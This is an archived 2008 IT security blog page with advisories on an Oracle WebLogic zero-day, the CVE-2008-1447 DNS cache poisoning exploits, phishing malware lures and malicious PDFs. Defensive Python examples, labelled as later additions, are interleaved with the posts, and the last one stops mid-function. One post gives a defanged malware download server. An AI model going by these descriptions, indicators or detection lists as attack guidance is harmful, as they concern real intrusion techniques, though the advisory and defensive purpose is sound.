
Harry Waldron - My IT Forums Blog

Sharing security developments and best practices for corporate and home users

July 2008 - Posts

  • Oracle WebLogic Server - Serious Zero Day (exploitable w/o authentication)

    Companies using Oracle WebLogic Server should apply the vendor's workaround quickly to address this serious security exposure: the flaw sits in the Apache Connector, is remotely exploitable without authentication, and no patch was available at the time of this post.

    Oracle WebLogic Server - Serious Zero Day (exploitable w/o authentication)
    http://isc.sans.org/diary.html?storyid=4798
    http://www.oracle.com/technology/deploy/security/alerts/alert_cve2008-3257.html

    QUOTE: Oracle has released an emergency workaround that corrects a 0-day flaw in WebLogic Server and WebLogic Express, specifically with the Apache Connector, which is remotely exploitable without authentication.

    Supported Products and Components Affected

    • Oracle WebLogic Server 10.0 released through MP1    
    • Oracle WebLogic Server 9.0, 9.1, 9.2 released through MP3    
    • Oracle WebLogic Server 8.1 released through SP6    
    • Oracle WebLogic Server 7.0 released through SP7    
    • Oracle WebLogic Server 6.1 released through SP7

    Patch Availability: Fixes for this vulnerability will be made available as soon as testing is completed when an updated version of this document will be uploaded and email sent to affected customers. Until fixes are available, workarounds described at

    https://support.bea.com/application_content/product_portlets/securityadvisories/2793.html

  • Best Practices - Importance of Making a Good Business Case

    These articles and templates are excellent resources for making a good business case:

    Best Practices - Importance of Making a Good Business Case
    http://blogs.techrepublic.com.com/tech-manager/?p=564
    http://blogs.techrepublic.com.com/tech-manager/?p=538

    Quote:
    The vast majority of unsuccessful projects fail not because of poor project management, but because of poor decisions with respect to the choice of projects. A good business case helps to make right decisions and avoid horrible waste.

    There is a fallacy that a business case is a thick tedious manuscript, written by professional consultants in an incomprehensible language. It’s printed on high-quality paper stock and placed onto the top shelf of an executive’s office to be used as a breeding ground for dust bunnies. This is not a business case; this is a disaster.

    The sole role of a business case is that of a communication tool, composed in a language that the target audience understands and with enough detail to facilitate decision making on his or her part. There’s no magic formula when it comes to the size of a business case. The size is irrelevant. What is relevant is that the business case provides all the necessary information to make the job of the decision maker possible. Brevity is always a virtue.


    Business Case and PM Templates
    http://www.bizvortex.com/index.php?option=com_content&task=section&id=7&Itemid=31

  • IT Security - The Essential guide to wireless security

    The IT Security web site provides EXCELLENT resources for corporate users. These articles provide comprehensive guidelines for implementing secure wireless networking.

    http://www.itsecurity.com/features/essential-guide-wireless-security-071708/

    As more businesses deploy wireless networks to connect employees, professional partners and the general public to company systems and the Internet, the need for enhanced wireless security grows increasingly important. Fortunately, as more companies become aware of the threats facing their wireless networks — and how to combat them — the gap between wired and wireless-network security is gradually narrowing.

    Related Articles:

    Nail Down Mobile Security

    Securing Your Enterprise Wireless Network

    Network Scanning: Find Out What’s Really on Your Wireless Network

    Wireless Security Checklist

  • Airline invoices and e-tickets - Fake malware versions circulating

    The recent fake UPS notices have been adapted to look like legitimate invoices and e-tickets a customer might expect to receive by email. Folks who have recently purchased e-tickets should be especially careful: the attachment is a .zip containing an executable, not a ticket.
     
     Airline invoices and e-tickets - Fake malware versions circulating
     http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9110883
     http://www.spyware-techie.com/genericdownloaderab-trojan-found-in-fake-invoice-and-airline-e-ticket-emails/
     http://www.avertlabs.com/research/blog/index.php/2008/07/25/invoice-spam-takes-flight/
     http://www.avertlabs.com/research/blog/index.php/2008/07/24/fake-invoice-spam-carries-malware/
     
     QUOTE: The e-mails, which purport to be from an airline, thank the recipient for using a new "Buy flight ticket Online" service on the airline's site, provide a log-in username and password, and say the person's credit card has been charged an amount usually in the $400 range. An attachment claims to be the invoice for the ticket and credit card charge.
     
     However, the .zip file format attachment is a Trojan horse that steals information, including keystrokes, from the infected Windows PC and transmits that data to a server hosted in Russia, according to McAfee threat researcher Craig Schmugar.
     
     EMAIL MESSAGES TO AVOID
     
     These messages may appear in following general format:
     
     From: [name] [airline_name] Airlines
     Subject: Your order from {airlines} [number]
     or
     Online order for flight ticket [number]
     
     
     Hello, Thank you for using our new service “Buy airplane ticket Online” on our website. Your account has been created:
     
     Your login: [characters]
     Your password: [characters]
     
     Your credit card has been charged for $[number in the $400 range]
     We would like to remind you that whenever you order tickets on our website you get a discount of 10%! Attached to this message is the purchase Invoice and the flight ticket. To use your ticket, simply print it on a color printed, and you are set to take off for the journey!
     
     Kind regards,
     [name]
     [airline]
     
     Attachment: E-ticket_[number].zip (containing an executable, which may have a Word document icon)

  • DNS Cache Poisoning Exploits - Now in-the-wild

    Below are the first confirmed reports that the new DNS cache poisoning vulnerability (CVE-2008-1447) is being exploited in the wild. Unpatched or misconfigured DNS servers now face a real, not theoretical, danger.
     
     DNS cache poisoning attacks exploited in the wild
     http://blogs.zdnet.com/security/?p=1590
     
     QUOTE: Numerous independent sources are starting to see evidence of DNS cache poisoning attempts on their local networks, in what appears to be an attempt to take advantage of the “recent” DNS cache poisoning vulnerability :
     
     Surprised? I’m not, since this was pretty logical given that the three publicly available exploits have been downloaded over 15,000 times in the last couple of days. What I’m actually surprised by is that it took so long to produce a working exploit, and that despite the media outbreak raising awareness on the potential for abuse, major international and local ISPs remain vulnerable. Ironically, they remain vulnerable just like they’ve always been even though patches for a particular vulnerability were available. Insecure and misconfigured DNS servers were, and continue to be, a realistic threat even in a Web 2.0 world.
     
     More on the risks associated with these new DNS exploits can be found here:
     
     http://msmvps.com/blogs/harrywaldron/archive/2008/07/26/avert-labs-excellent-diagrams-on-new-dns-dangers.aspx
     
     http://msmvps.com/blogs/harrywaldron/archive/2008/07/24/new-dsn-exploits-are-being-developed-patch-your-servers-now.aspx

  • AVERT Labs - Excellent Diagrams on new DNS dangers

     The diagrams in the link below are excellent in showing how DNS resolves host names to numerical IP addresses, and how the bad guys can manipulate that resolution with the new exploits. Most vendors now offer security updates for their DNS software, and these should be applied as quickly as possible to better protect corporate Internet applications and customer information (especially from phishing attacks that rely on redirected lookups).

    http://www.avertlabs.com/research/blog/index.php/2008/07/23/the-cat-is-out-of-the-bag-dns-bug/

  • Techniques to use in working with Difficult People

    This is a good article on tactics and communication techniques when working with co-workers who create issues in the workplace.

    The Thing That Drives Me Nuts About My Co-Worker
    http://msn.careerbuilder.com/custom/msn/careeradvice/viewarticle.aspx?articleid=1566

    QUOTE: For many people, bad habits are unconscious. John might not realize that clipping his fingernails in the lunchroom is repulsive. Suzy is clueless that coffee was not made to be slurped and Ed doesn't know that showering only three times per week is unhygienic (and stinky!).

    Let's be honest: Nobody's perfect; not even you. Results from a recent MSN Zogby data poll show that 20 percent of workers say their co-workers have at least one habit that drives them crazy. So while your co-worker might have a more obvious bothersome tendency (like always talking on speakerphone), maybe your constant complaining about everyone else's behaviors has the same effect.

    "You really only have one option when it comes to being annoyed by a fellow employee," says Donna Flagg, president of The Krysalis Group, a business and management consulting firm in New York City. "Simply let your co-worker know how you feel and politely ask them if they would mind curtailing their annoying habit."

    Techniques for addressing co-worker issues

    1. Ask yourself if the behavior is better described as controlled or a recurring pattern
    2. Check yourself
    3. Be discreet
    4. Be specific
    5. Be positive

  • Microsoft confirms IE 8 will ship this year

    As IE 8 offers improved security and support for World Wide Web Consortium (W3C) web standards, webmasters and web developers should test their applications extensively in the coming months.

    Article: Microsoft confirms IE 8 will ship this year
    http://blogs.zdnet.com/microsoft/?p=1500&tag=nl.e539

    QUOTE: Microsoft Senior Vice President of Online Services and Windows, Bill Veghte, just told attendees that Microsoft will release the final version of Internet Explorer (IE) 8 to the Web “later this year.”

    Microsoft has tried its best not to provide a ship target for IE 8 — like most of its Windows client family of products. Company officials did acknowledge last month that a second public beta of IE 8 is due out in August.

    Microsoft has been warning Web developers to prep for IE 8, which will be more standards-compliant, to prepare now for IE 8 by adding a new tag to their sites to keep them from breaking when viewed with IE 8.

    IE 8 Beta 2 will be available in August
    http://blogs.msdn.com/ie/archive/2008/06/03/ie8-beta-2-coming-in-august.aspx

  • New DNS Exploits are being developed - Patch your servers now

    Below are resources for corporate users on the new DNS cache poisoning vulnerability. The CERT advisory has an excellent list of vendors and their current status for this issue. Apply the applicable security patches for DNS servers as quickly as possible: exploit code is being actively developed.

    So far, two versions of exploit code have been released for this vulnerability. The first poisons individual cached records; security researcher H.D. Moore has released a more potent second exploit that replaces the nameserver entries for an entire domain, regardless of what is already cached, with the potential to redirect traffic to malicious sites (e.g., malware downloads, phishing attacks, etc.).

    In some ways, this new security exposure is reminiscent of the Code Red and Blaster attacks during the earlier part of this decade. While security patches were available, many companies did not have the time or insight to patch all of their potential exposures. While there's time, security administrators should PATCH NOW.

    ARTICLES: Major DNS vulnerability now public
    http://cwflyris.computerworld.com/t/3374560/1676699/127883/2/
    http://isc.sans.org/diary.html?storyid=4765
    http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1447
    http://blog.trendmicro.com/major-dns-cache-poisoning-vulnerability-patch-now/
    http://www.informationweek.com/news/internet/security/showArticle.jhtml?articleID=209401195
    http://blog.wired.com/27bstroke6/2008/07/details-of-dns.html

    QUOTE: "Patch. Today. Now. Yes, stay late." - That's the word from security researcher Dan Kaminsky, who recently presided over an unprecedented effort to coordinate a fix for a DNS vulnerability across more than 80 software and hardware vendors

    Several hackers are almost certainly already developing attack code for the bug, and it will most likely crop up within the next few days, said Dave Aitel, chief technology officer at security vendor Immunity Inc. His company will eventually develop sample code for its Canvas security testing software too, a task he expects to take about a day, given the simplicity of the attack. "It's not that hard," he said. "You're not looking at a DNA-cracking effort."

    The attack can be used to redirect victims to malicious servers on the Internet by targeting the DNS servers that serve as signposts for all of the Internet's traffic. By tricking an ISP's servers into accepting bad information, attackers could redirect that company's customers to malicious Web sites without their knowledge.

    Although a software fix is now available for most users of DNS software, it can take time for these updates to work their way through the testing process and actually get installed on the network. "Most people have not patched yet," Vixie said. "That's a gigantic problem for the world."

    EXPLOIT DEVELOPMENTS: Second more critical exploit in the wild
    http://blog.wired.com/27bstroke6/2008/07/dns-exploit-in.html

    QUOTE: We just added a second exploit which replaces the nameservers of the target domain. This is the bug people should actually care about, since it doesn't matter if anything is already cached. Regarding the cache situation (of the first exploit) -- it's not possible to do cache overwrites, but it is possible to look up the cache timeout, wait for it, and then replace it. With the new exploit module, we just change the DNS server for the entire domain (regardless of what is cached), so it's much more effective for wide-scale hijacking.
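    The exploit quoted above is cheap against an unpatched resolver because the resolver reuses one UDP source port for every outbound query, leaving only the 16-bit transaction ID for the attacker to guess; the patches add source port randomization. The script below is an added example, not part of the original post or of any vendor's tooling: it parses tcpdump-style lines for a resolver's outbound queries, reports whether the source port is fixed, and estimates how many forced lookups an attacker needs in each case. The log lines, the resolver address 10.0.0.53 and the query names are constructed for the example, and the ephemeral port range of 1024-65535 is an assumption.

```python
"""Added example: check a resolver's outbound queries for source port
randomization and quantify the attacker's cost with and without it.
All log lines below are constructed (tcpdump-style text), not a real capture."""
import re

# Six outbound queries from an unpatched resolver: source port 32768 every time.
FIXED_PORT_LOG = """\
12:00:01.001 IP 10.0.0.53.32768 > 192.0.2.10.53: 4136+ A? a1.example.com. (32)
12:00:01.002 IP 10.0.0.53.32768 > 192.0.2.10.53: 51029+ A? a2.example.com. (32)
12:00:01.003 IP 10.0.0.53.32768 > 192.0.2.10.53: 9921+ A? a3.example.com. (32)
12:00:01.004 IP 10.0.0.53.32768 > 192.0.2.10.53: 60233+ A? a4.example.com. (32)
12:00:01.005 IP 10.0.0.53.32768 > 192.0.2.10.53: 18875+ A? a5.example.com. (32)
12:00:01.006 IP 10.0.0.53.32768 > 192.0.2.10.53: 27740+ A? a6.example.com. (32)
"""

# The same queries after patching: a fresh source port for each one (constructed).
RANDOM_PORT_LOG = """\
12:00:01.001 IP 10.0.0.53.45123 > 192.0.2.10.53: 4136+ A? a1.example.com. (32)
12:00:01.002 IP 10.0.0.53.60811 > 192.0.2.10.53: 51029+ A? a2.example.com. (32)
12:00:01.003 IP 10.0.0.53.2054 > 192.0.2.10.53: 9921+ A? a3.example.com. (32)
12:00:01.004 IP 10.0.0.53.33517 > 192.0.2.10.53: 60233+ A? a4.example.com. (32)
12:00:01.005 IP 10.0.0.53.51298 > 192.0.2.10.53: 18875+ A? a5.example.com. (32)
12:00:01.006 IP 10.0.0.53.12990 > 192.0.2.10.53: 27740+ A? a6.example.com. (32)
"""

# Source port of the query and the transaction ID tcpdump prints before "+".
QUERY_RE = re.compile(r"IP \S+\.(\d+) > \S+\.53: (\d+)\+ ")

TXID_SPACE = 65536                   # 16-bit DNS transaction ID
EPHEMERAL_PORTS = 65535 - 1024 + 1   # assumption: resolver draws from 1024-65535


def parse_queries(text):
    """Return (source_port, txid) for every outbound query line that matches."""
    pairs = []
    for line in text.splitlines():
        m = QUERY_RE.search(line)
        if m:
            pairs.append((int(m.group(1)), int(m.group(2))))
    return pairs


def port_randomization_report(pairs):
    """Summarize how much entropy the resolver adds beyond the 16-bit TXID."""
    ports = {p for p, _ in pairs}
    ids = {i for _, i in pairs}
    return {
        "queries": len(pairs),
        "distinct_ports": len(ports),
        "distinct_txids": len(ids),
        # One port across several queries is the signature of an unpatched resolver.
        "fixed_source_port": len(pairs) > 1 and len(ports) == 1,
    }


def guess_space(port_randomized):
    """Number of (port, txid) combinations an attacker's spoofed reply must hit."""
    return TXID_SPACE * (EPHEMERAL_PORTS if port_randomized else 1)


def race_success_probability(spoofed_replies, port_randomized):
    """Chance that one race (one lookup the attacker triggered) is won when the
    attacker lands `spoofed_replies` distinct guesses before the real answer."""
    return min(1.0, spoofed_replies / guess_space(port_randomized))


def expected_races(spoofed_replies, port_randomized):
    """Average number of forced lookups before a spoofed answer is accepted."""
    return 1.0 / race_success_probability(spoofed_replies, port_randomized)


if __name__ == "__main__":
    for label, log in (("fixed port", FIXED_PORT_LOG), ("random port", RANDOM_PORT_LOG)):
        print(label, port_randomization_report(parse_queries(log)))
    for randomized in (False, True):
        print("randomized" if randomized else "fixed",
              "port: expected races with 200 spoofed replies each:",
              round(expected_races(200, randomized)))
```

    On a real resolver, capture the input with tcpdump (for example `tcpdump -n 'udp dst port 53 and src host <resolver>'`) while forcing a few lookups of names that are not cached. One caveat worth checking: a NAT device in front of a patched resolver can rewrite the randomized source ports back into a predictable sequence, so test from outside the NAT as well as on the host itself.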

    Microsoft DNS Patch should be applied ASAP
    http://www.microsoft.com/technet/security/bulletin/ms08-037.mspx

    CERT Advisory - Provides a detailed status report by vendor
    http://www.kb.cert.org/vuls/id/800113

    Vendor | Status | Last updated (see the CERT advisory above for more recent updates)

    3com, Inc. | Unknown | 10-Jul-2008
    Alcatel-Lucent | Unknown | 23-Jul-2008
    Apple Computer, Inc. | Unknown | 5-May-2008
    AT&T | Unknown | 21-Apr-2008
    Avaya, Inc. | Vulnerable | 16-Jul-2008
    Avici Systems, Inc. | Unknown | 21-Apr-2008
    Belkin, Inc. | Unknown | 13-Jul-2008
    Blue Coat Systems | Vulnerable | 22-Jul-2008
    BlueCat Networks, Inc. | Vulnerable | 22-Jul-2008
    Check Point Software Technologies | Not Vulnerable | 23-Jul-2008
    Cisco Systems, Inc. | Vulnerable | 10-Jul-2008
    Conectiva Inc. | Unknown | 5-May-2008
    Cray Inc. | Unknown | 5-May-2008
    D-Link Systems, Inc. | Unknown | 2-May-2008
    Data Connection, Ltd. | Unknown | 21-Apr-2008
    Debian GNU/Linux | Vulnerable | 9-Jul-2008
    djbdns | Not Vulnerable | 10-Jul-2008
    dnsmasq | Vulnerable | 11-Jul-2008
    DragonFly BSD Project | Unknown | 3-Jul-2008
    EMC Corporation | Unknown | 21-Apr-2008
    Engarde Secure Linux | Unknown | 5-May-2008
    Ericsson | Unknown | 21-Apr-2008
    Extreme Networks | Unknown | 21-Apr-2008
    F5 Networks, Inc. | Vulnerable | 14-Jul-2008
    Fedora Project | Unknown | 5-May-2008
    Force10 Networks, Inc. | Not Vulnerable | 11-Jul-2008
    Foundry Networks, Inc. | Not Vulnerable | 10-Jul-2008
    FreeBSD, Inc. | Vulnerable | 14-Jul-2008
    Fujitsu | Vulnerable | 18-Jul-2008
    Gentoo Linux | Vulnerable | 12-Jul-2008
    Gnu ADNS | Unknown | 5-May-2008
    GNU glibc | Unknown | 5-May-2008
    Hewlett-Packard Company | Vulnerable | 16-Jul-2008
    Hitachi | Unknown | 21-Apr-2008
    Honeywell | Unknown | 21-Apr-2008
    IBM Corporation | Vulnerable | 12-Jul-2008
    IBM Corporation (zseries) | Unknown | 5-May-2008
    IBM eServer | Unknown | 21-Apr-2008
    Infoblox | Vulnerable | 21-Jul-2008
    Ingrian Networks, Inc. | Unknown | 5-May-2008
    Intel Corporation | Unknown | 21-Apr-2008
    Internet Systems Consortium | Vulnerable | 14-Jul-2008
    JH Software | Not Vulnerable | 10-Jul-2008
    Juniper Networks, Inc. | Vulnerable | 10-Jul-2008
    Linux Kernel Archives | Unknown | 3-Jun-2008
    Lucent Technologies | Unknown | 21-Apr-2008
    Luminous Networks | Unknown | 21-Apr-2008
    Mandriva, Inc. | Vulnerable | 22-Jul-2008
    MaraDNS | Not Vulnerable | 10-Jul-2008
    Men & Mice | Unknown | 5-May-2008
    Metasolv Software, Inc. | Unknown | 5-May-2008
    Microsoft Corporation | Vulnerable | 8-Jul-2008
    MontaVista Software, Inc. | Unknown | 5-May-2008
    Motorola, Inc. | Unknown | 21-Apr-2008
    Multinet (owned Process Software Corporation) | Unknown | 21-Apr-2008
    Multitech, Inc. | Unknown | 21-Apr-2008
    NEC Corporation | Not Vulnerable | 18-Jul-2008
    NetApp | Unknown | 3-Jul-2008
    NetBSD | Unknown | 5-May-2008
    Netgear, Inc. | Unknown | 21-Apr-2008
    Network Appliance, Inc. | Unknown | 21-Apr-2008
    Nixu | Vulnerable | 9-Jul-2008
    NLnet Labs | Not Vulnerable | 10-Jul-2008
    Nokia | Unknown | 21-Apr-2008
    Nominum | Vulnerable | 10-Jul-2008
    Nortel Networks, Inc. | Unknown | 21-Apr-2008
    Novell, Inc. | Vulnerable | 14-Jul-2008
    OpenBSD | Vulnerable | 24-Jul-2008
    OpenDNS | Not Vulnerable | 10-Jul-2008
    Openwall GNU/*/Linux | Vulnerable | 17-Jul-2008
    PePLink | Not Vulnerable | 10-Jul-2008
    Posadis project | Unknown | 14-Jul-2008
    PowerDNS | Not Vulnerable | 10-Jul-2008
    QNX, Software Systems, Inc. | Unknown | 5-May-2008
    Red Hat, Inc. | Vulnerable | 10-Jul-2008
    Redback Networks, Inc. | Unknown | 21-Apr-2008
    Secure Computing Network Security Division | Vulnerable | 17-Jul-2008
    Shadowsupport | Unknown | 5-May-2008
    Siemens | Unknown | 8-Jul-2008
    Silicon Graphics, Inc. | Unknown | 5-May-2008
    Slackware Linux Inc. | Vulnerable | 12-Jul-2008
    Sony Corporation | Unknown | 21-Apr-2008
    Sun Microsystems, Inc. | Vulnerable | 10-Jul-2008
    SUSE Linux | Vulnerable | 11-Jul-2008
    The SCO Group | Unknown | 5-May-2008
    Trustix Secure Linux | Unknown | 5-May-2008
    Turbolinux | Unknown | 5-May-2008
    Ubuntu | Vulnerable | 10-Jul-2008
    Wind River Systems, Inc. | Vulnerable | 9-Jul-2008
    ZyXEL | Unknown | 21-Apr-2008

  • Email threat - Avoid free Windows Malicious Software Removal Tool

    This new malware threat is well done from an HTML and social engineering perspective. Microsoft delivers the Malicious Software Removal Tool (MSRT) automatically through its monthly Windows Update process and never sends tools like this out by email. These messages should be deleted.

    Windows Malicious Software Removal Tool Free Today
    http://sunbeltblog.blogspot.com/2008/07/another-fake-ms-spam.html

    QUOTE: As we all know, for quite some time now, spam has stopped just being a nuisance, and became a serious potential security threat.  It used to be that one wouldn’t get too upset if the occasional Viagra email got through a spam filter.  That’s no longer the case: Spam is a significant vector for malware infection through malicious links and social engineering, and if something gets through a spam filter — and then makes it past endpoint protection — one can have all kinds of nasty headaches.  

    EXAMPLE OF EMAIL MESSAGE CURRENTLY CIRCULATING

    Subject: Windows Malicious Software Removal Tool Free Today.

    The content in text format.

    Click Here! *** Malicious link removed ***

    About this mailing:

    You are receiving this e-mail because you subscribed to MSN Featured Offers.
    Microsoft respects your privacy. If you do not wish to receive this MSN
    Featured Offers e-mail, please click the "Unsubscribe" link below. This will
    not unsubscribe you from e-mail communications from third-party advertisers
    that may appear in MSN Feature Offers. This shall not constitute an offer by
    MSN. MSN shall not be responsible or liable for the advertisers' content nor
    any of the goods or service advertised. Prices and item availability subject
    to change without notice.

    2008 Microsoft | Unsubscribe <http://www.msn.com>  | More Newsletters
    <http://www.msn.com>  | Privacy <http://www.msn.com>

    Microsoft Corporation, One Microsoft Way, Redmond, WA 98052

  • United Parcel Service - Fake email for package non-delivery

    McAfee and other AV vendors are highlighting this latest social engineering attack. A well disguised email message appears to come from UPS. It claims that a package cannot be delivered unless the fake waybill attachment is opened.

    Users opening the attachment are infected with malicious code from a downloader that retrieves its payload from a Russian website.

    United Parcel Service - Fake email for package non-delivery 
    http://vil.mcafeesecurity.com/vil/content/v_132901.htm
    http://wcco.com/techcenter/ups.email.virus.2.771489.html
    http://urbanlegends.about.com/b/2008/07/15/ups-virus-warning.htm
    http://www.startribune.com/local/25464324.html
    http://www.ups.com/content/us/en/about/news/service_updates/virus_us.html

    QUOTE: United Parcel Service is warning of a computer virus circulating under the guise of an e-mail from UPS. According to a release from UPS, the virus is attached to an e-mail that warns readers they have a shipment that couldn't be delivered unless they click on the attachment. The e-mail claims the attachment contains a waybill that will allow the undelivered package to be picked up.

    COPY OF EMAIL MESSAGE: (spoofed to appear from UPS)

    "Unfortunately we were not able to deliver postal package you sent on July the 1st in time because the recipient’s address is not correct. Please print out the invoice copy attached and collect the package at our office. 
     
    Your UPS"

    The attached file is an executable which downloads files from the following server:

    hxxp: //fixaserver (dot) ru / ldr / [Removed]
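    Both the airline e-ticket lure earlier on this page and the UPS waybill lure above deliver a .zip whose only member is an executable, often carrying a document icon or a name like invoice.doc.exe. The following is an added example, not code from any of the sources quoted: a gateway-side check that opens the attachment in memory, flags executable and double extensions, and reads only the first two bytes of each member to spot a PE header (MZ) regardless of the file name. The archives, member names and contents are constructed fixtures; no real malware is involved.

```python
"""Added example: inspect a .zip e-mail attachment for the executable-in-archive
lure. Fixtures are built in memory; the "executable" is a fake PE header."""
import io
import zipfile

EXEC_EXTENSIONS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js"}
DOC_EXTENSIONS = {".doc", ".pdf", ".xls", ".txt", ".rtf"}
PE_MAGIC = b"MZ"   # first two bytes of every Windows executable


def build_zip(members):
    """Return the bytes of a zip holding {name: content} (fixture builder)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


def sample_lure_attachment():
    """Constructed stand-in for E-ticket_<number>.zip: fake PE with a .doc.exe name."""
    return build_zip({"E-ticket_48213.doc.exe": PE_MAGIC + b"\x90" * 62})


def sample_benign_attachment():
    """Constructed harmless archive for comparison."""
    return build_zip({"invoice_48213.txt": b"Thank you for your order.\n"})


def inspect_zip_attachment(data, max_members=50):
    """Return a list of (member, reason) findings; an empty list means nothing suspicious."""
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return [("<archive>", "not a valid zip")]
    findings = []
    with zf:
        infos = zf.infolist()
        if len(infos) > max_members:
            # Cap the work per message so an oversized archive cannot stall the gateway.
            findings.append(("<archive>", f"more than {max_members} members"))
            infos = infos[:max_members]
        for info in infos:
            name = info.filename.rsplit("/", 1)[-1].lower()
            parts = name.split(".")
            ext = "." + parts[-1] if len(parts) > 1 else ""
            if ext in EXEC_EXTENSIONS:
                findings.append((info.filename, "executable extension " + ext))
            # invoice.doc.exe: a document extension placed before the real one
            if len(parts) > 2 and "." + parts[-2] in DOC_EXTENSIONS:
                findings.append((info.filename, "double extension ." + parts[-2] + ext))
            with zf.open(info) as member:
                head = member.read(2)   # header only; never inflate the whole member
            if head == PE_MAGIC:
                findings.append((info.filename, "PE header (MZ) regardless of name"))
    return findings


def should_quarantine(data):
    """Policy hook: any finding is enough to hold the message for review."""
    return bool(inspect_zip_attachment(data))


if __name__ == "__main__":
    for label, blob in (("lure", sample_lure_attachment()), ("benign", sample_benign_attachment())):
        print(label, should_quarantine(blob), inspect_zip_attachment(blob))
```

    The magic-byte check matters more than the extension check: renaming the member to ticket.pdf does not change its first two bytes. Reading two bytes per member, rather than extracting, also keeps a decompression bomb from turning the scanner itself into a denial of service.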

  • Oracle Security Update for July 2008 - 45 updates for all products

    As applicable for their environment, corporate DBAs and system administrators should download, pilot test, and then install these critical security updates to better protect Oracle-based applications.

    QUOTE: The Critical Patch Update for July 2008 was released on July 15, 2008. Oracle strongly recommends applying the patches as soon as possible.

    Oracle Security Update for July 2008
    http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujul2008.html

  • Music Files - New Codec injection attacks add danger for Multi-media files

    Sometimes one bad apple can spoil the entire bunch. A new injection-based codec attack has surfaced which can infect all multimedia files on the hard drive. For example, a malicious MP3 file can be downloaded and, if the fake codec prompt is accepted, the malware injects its code into every multimedia file it processes. Folks should continue to use only trusted sources for music or video.

    Infectious Music, Malware-Style
    http://www.trustedsource.org/blog/132/Trojan-infecting-multimedia-files
    http://blog.trendmicro.com/infectious-music-malware-style/

    QUOTE: A malware that infects multimedia files, modifying them to require the download of a fake codec when played had recently been discovered. It infects widely used multimedia file formats such as MP3, WMA and WMV video files by injecting a malicious code. The said malware is also capable of converting files such as MP2 and MP3 into Windows Media Audio (WMA) format. When a user tries to play an infected file, a pop-up message is displayed, asking the user to download a certain codec in order to play the file. The downloaded codec is of course, nothing else but malware.

    But this malware takes it to a new, and more dangerous level; it manipulates a person’s multimedia files and uses it against them. People normally keep thousands of multimedia files on their systems, especially MP3s. If each file is infected by the malware then shared through a P2P network, then the user unknowingly turns into a malware host.

  • Storm Worm - Avoid Tabloid headlines in Spam messages

    The social engineering tactics used by the Storm worm continue to be well engineered. These deceptive messages attempt to trick folks into selecting malicious links that download malware to vulnerable systems.

    Storm Worm - Avoid Tabloid headlines in Spam messages
    http://redtape.msnbc.com/2008/07/no-presidential.html

    QUOTE: No, spammers haven’t hired a bunch of former supermarket tabloid writers. They’re just doing what they do best – exploiting human nature.

    The Storm worm is the Internet's version of Broadway’s “Phantom of the Opera” -- the longest running hit show around. Storm first appeared in January 2007, teasing users with a headline about deadly storms that hit Europe -- "230 dead as storm batters Europe," it said, offering a link to a full story. Clickers found themselves infected with the Storm worm.

    Storm was an immediate hit for the hackers, who managed to trick hundreds of thousands of recipients into clicking on the booby-trapped link. That enabled them to build an enormous network of hijacked computers, called a botnet, which they use to send out more spam or commit other Internet crimes.

    There have been hundreds of Storm variants since the first one, sent by a loosely affiliated gang of computer criminals. Some estimates say that up to 10 million PCs have been infected with Storm at one time or another.

    But in April, Microsoft updated its malicious software removal tool, much to the chagrin of the hackers. About four-fifths of the vast Storm network was cut off, said Paul Wood, a security researcher at MessageLabs.

    Comprehensive list of dozens of headlines from Message Labs
    http://www.msnbc.msn.com/id/25680334

  • Malicious PDF files - Death of the Internet in 2012

    There are dangerous PDF files being circulated by spammers. The new PDF-based attacks typically use JavaScript embedded in the document to infect vulnerable systems. Users should always avoid opening any unexpected document or link in email messages. It is also important to stay up to date on all security updates available from Adobe and other software vendors.

    Malicious PDF files - Death of the Internet in 2012
    http://blog.trendmicro.com/death-of-the-internet-foretold/

    The malware involved in this spam run is detected by Trend Micro as TROJ_PIDIEF.JT, a Trojan that arrives as a PDF file named DOC.PDF. This file promises more information regarding the alleged Internet death.

    PIDIEF Trojans are known malware droppers or downloaders, so once users click on the attached PDF file — and whether or not they believe the theory — another malware is already up and running on their systems and doing malicious routines. The death of the Internet is going to be the least of their problems after that …

    Internet Storm Center - PDF Javascript based exploits
    http://isc.sans.org/diary.html?storyid=4726
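    The PIDIEF sample above arrives as a PDF whose embedded JavaScript is typically fired by an auto-open action. As an added example (not code from Trend Micro, ISC or the original post), the script below does a first-pass triage of a PDF attachment: it resolves the /#xx name escapes attackers use to hide /JavaScript, counts the script-related and auto-run names, and tiers the result. The two PDFs are constructed minimal fixtures and the script inside the malicious one is a harmless placeholder.

```python
"""Added example: first-pass triage of a PDF attachment for auto-run JavaScript.
The PDF fixtures below are constructed; the embedded script is a placeholder."""
import re

# Names worth flagging. /#xx escapes are resolved first so that the common
# obfuscation /J#61vaScript is counted as /JavaScript.
SUSPICIOUS_NAMES = ("/JavaScript", "/JS", "/OpenAction", "/AA", "/Launch", "/EmbeddedFile")
NAME_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")

MALICIOUS_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /S /J#61vaScript /JS (app.alert('placeholder');) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""


def normalize_names(data):
    """Resolve #xx escapes so obfuscated names compare equal to plain ones."""
    return NAME_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def scan_pdf(data):
    """Count suspicious names and note whether objects may hide in compressed streams."""
    if not data.startswith(b"%PDF"):
        return {"_error": "not a PDF header"}
    text = normalize_names(data)
    hits = {}
    for name in SUSPICIOUS_NAMES:
        # (?![A-Za-z]) keeps /JS from matching inside a longer name such as /JSX
        n = len(re.findall(re.escape(name.encode()) + rb"(?![A-Za-z])", text))
        if n:
            hits[name] = n
    # Names inside /FlateDecode or /ObjStm streams are invisible to this pass.
    hits["_streams_compressed"] = b"/FlateDecode" in text or b"/ObjStm" in text
    return hits


def risk_score(hits):
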